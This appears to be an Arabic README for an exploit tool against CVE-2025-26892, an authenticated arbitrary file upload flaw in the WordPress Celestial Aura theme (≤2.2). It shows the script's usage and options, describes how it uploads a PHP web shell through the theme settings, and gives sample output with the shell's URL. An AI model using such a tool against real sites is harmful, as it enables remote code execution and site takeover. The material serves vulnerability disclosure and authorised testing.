
قالب Celestial Aura لووردبريس <= 2.2 معرّض لثغرة Arbitrary File Upload
توجد ثغرة رفع ملفات غير مقيد في ثيم WordPress Celestial Aura (مطوَّر بواسطة dkszone) حتى الإصدار 2.2.
يمكن لمستخدم مصادق عليه بصلاحيات منخفضة رفع ملفات PHP تعسفية عبر لوحة إدارة الثيم، مما قد يؤدي إلى تنفيذ برمجي عن بُعد (RCE).
Celestial Aurawp-admin/admin.php?page=CA-settingsتقييم Patchstack CNA:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:Husage: CVE-2025-26892.py [-h] --url URL --username USERNAME --password PASSWORD
CVE-2025-26892 | WordPress Celestial Aura Theme <= 2.2 Arbitrary File Upload (Authenticated)
options:
-h, --help Show this help message and exit
--url, -u URL Target WordPress site (e.g., http://127.0.0.1/wordpress)
--username, -un WordPress username (any authenticated user)
--password, -p WordPress password
يقوم السكربت بتسجيل الدخول باستخدام البيانات المقدَّمة، ويرفع قشرة PHP خبيثة (nxploit.php) عبر إعدادات الثيم المعرَّضة، ثم يطبع الرابط المباشر للقشرة المرفوعة.
[+] Exploit sent successfully.
[+] Form Fields Sent:
- CA_hdrimage: yes
...
- CA_save: Save changes
[+] Shell Location:
http://target-site/wp-content/uploads/nxploit.php
Exploit By: Khaled_alenazi (Nxploited)
هذا المشروع مخصص لأغراض الاختبارات التعليمية واختبار الاختراق المأذون به فقط.
أي استخدام سيئ لهذه الأداة ليس من مسؤولية المؤلف.